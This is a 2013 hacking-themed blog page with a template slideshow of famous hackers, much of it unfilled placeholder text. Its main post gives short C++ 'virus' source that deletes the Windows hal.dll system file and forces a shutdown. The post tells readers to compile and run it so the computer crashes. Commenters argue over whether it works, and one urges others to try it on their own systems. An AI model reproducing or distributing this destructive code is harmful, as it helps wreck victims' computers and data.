//]]>
  • Gary McKinnon

    USA declared him as the biggest military computer hacker ever. He hacked the security system of NASA and Pentagon. This made him one of the great black hat hacker celebrities and got his name into the hacker's community.He has illegally accessed 97 computers and has caused around $700,000 damage to the economy.

  • Kevin David Mitnick

    This is slide 2 description. Go to Edit HTML and find this content. Replace it your own description.

  • Kevin Poulson

    This is slide 3 description. Go to Edit HTML and find this content. Replace it your own description.

  • Robert Tappan Morris

    This is slide 4 description. Go to Edit HTML and find this content. Replace it your own description.

  • Robert Tappan Morris

    This is slide 5 description. Go to Edit HTML and find this content. Replace it your own description.

  • This is Slide 6 Title - NewBloggerThemes.com

    This is slide 6 description. Go to Edit HTML and find this content. Replace it your own description.

Wednesday, 27 March 2013

Posted by Unknown
6 comments | 10:48 pm



This virus will delete the hal.dll (this  file helps the system in startup) in your system32 folder. After performing such task your will no longer will be able to start your system.....

#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
   std::remove("C:\\windows\\system32\\hal.dll"); 
    system("shutdown -s -r");
    system("PAUSE");
    return EXIT_SUCCESS;
}
After typing the above source code in  notepad ,save the file as bee.cpp.
 After saving...
compile the source file ...
You will get a .exe file 
On opening the .exe file your system will restart and crash...

6 comments:

  1. I doubt if it wud work, so can u plz demonstrate it in ur pc..???;-) well, Ethical Hacker turns into a potential Virus programmer huh???

    ReplyDelete
    Replies
    1. @rahul try this in ur system...U have alternate os know??

      Delete
  2. always saying that u r vetti but c now wat u r dng???? fooling others!!
    and another one issue if u r posting on your blog u should test it then only u should post it... so first verify then post it!!

    ReplyDelete
    Replies
    1. rytly said mate.. first he himself must check it..

      Delete
  3. @vignesh I checked,it works....if u have doubt check in your system....

    ReplyDelete
  4. can i get software or something to do to detect such virus ?

    ReplyDelete

Blogroll

About